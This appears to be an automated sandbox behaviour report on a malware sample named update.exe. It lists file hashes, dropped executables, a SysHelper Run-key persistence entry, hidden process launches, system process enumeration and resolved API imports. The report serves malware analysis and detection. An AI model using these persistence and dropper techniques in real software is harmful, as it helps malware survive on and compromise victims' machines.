C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\desktop.ini	0.40 KB	MD5: 9095947b4accd8e7cc8d4ee798c45667 SHA1: d5fa56c198f021eacafa7dccc135837956e734e7 SHA256: 4feafa99292984e5f6eb37b2b2ce8eacc103a5f89fd7866d25e34a912756160e SSDeep: 6:Chp3bZ9tz20guqjlcYlP2M3haJa4pYBITHW3mVkTCEAV6KthnNa3hYN7GNZH:ilZ9RF+9tcw4pYBIT+OE46Kthnc3nL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\desktop.ini	0.28 KB	MD5: 3cc774c46b7f0f5d4024736f90ffeb22 SHA1: ab6c40da423a8a3e662eb7a8d4b4323191466c9d SHA256: a6148c8700f56f60e8005c9def160b887352dde74ff01fdd4f6fb5ad8f60c760 SSDeep: 6:Chp3bZ9tz20guqtHO7oxR+asK59q5GYigX1OPl02n:ilZ9RF+tHms0asq9uG8X0902	... File Actions Show Properties Download

Host Behavior

File (399)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\4.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238	-	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Write	-	size = 48	1	Fn
Write	-	size = 2	1	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	size = 10240	18	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	size = 512	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	size = 10240	18	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	size = 2048	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe	size = 10240	12	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe	size = 8192	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\4.exe	size = 10240	335	Fn Data

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ	1	Fn

Process (150)

Operation	Process	Additional Information	Count	Logfile
Create	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsNotAutoStart IsNotTask	os_pid = 0x9b4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --Service 2308 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	os_pid = 0x9bc, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe	show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe	show_window = SW_SHOWNORMAL	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\reference assemblies\attend.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\uninstall information\ppdfaccounting.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\firmintroduction.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\reference assemblies\emmafe.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows sidebar\dressed.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\calculations-eternal.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\refine belief dietary.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\internet explorer\brilliant.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\significance_five_digit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\domestic.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\rocontinually.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows portable devices\privilege.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows nt\sequence.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows media player\abilities_imported_yale.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\discrete.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows mail\subscriptions_comparable_server.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft office\logic_acre.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\ad floyd.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\laptop.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	16	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	13	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe	desired_access = SYNCHRONIZE	61	Fn

Module (293)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x75a20000	2	Fn
Load	RPCRT4.dll	base_address = 0x772d0000	1	Fn
Load	MPR.dll	base_address = 0x75250000	1	Fn
Load	WININET.dll	base_address = 0x75be0000	1	Fn
Load	WINMM.dll	base_address = 0x75210000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75ce0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75a20000	1	Fn
Load	USER32.dll	base_address = 0x756f0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75b30000	1	Fn
Load	SHELL32.dll	base_address = 0x76670000	1	Fn
Load	ole32.dll	base_address = 0x75540000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75f60000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75270000	1	Fn
Load	WS2_32.dll	base_address = 0x764c0000	1	Fn
Load	DNSAPI.dll	base_address = 0x751a0000	1	Fn
Load	msvcr100.dll	base_address = 0x750e0000	1	Fn
Load	Psapi.dll	base_address = 0x76420000	1	Fn
Load	Shell32.dll	base_address = 0x76670000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75a20000	13	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75a3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77890fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77889d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x75ab5cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x75a3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75a33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75a4d802	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x772f1635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77311ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x7734d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77313fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x772ef48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75252dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75252f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75253058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75c0f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75bfb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75c05c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75bfab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75c09197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c5be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c230f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x752126e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x75cfa1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x75cfbb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x75d1ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x75cf81ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75cf3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x75ced65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x75cf45bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x75a4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x75a534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x75ab425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x75a33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x75a4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x75a33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75a35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x75a3196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75a35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a31b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x75a4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x75a3588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x75a35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x75a34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x75a5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x75a52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x75a35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75a31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75a49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75a3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x75a5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x75a33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x75a4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x75a4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75a35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75a34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x75a34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x75a353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x75a5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x75a52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x75ab4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75a4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75a33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75a314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75a311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x75a349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75a31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x75a387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75a5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x75a351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x75a351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75a33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75a31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75a34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x778845f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75a33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75a358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x75a317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x75ad7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75a31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75a4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x75a38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x75a3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x75a5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77891f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75a5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x75ab454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7787e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x75a57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75a31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77872270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x778722b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77883002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75a351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ab40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75a34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a37a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75a31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75a34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75a3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x75a5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75a35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75a34a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x75a53102	1	Fn
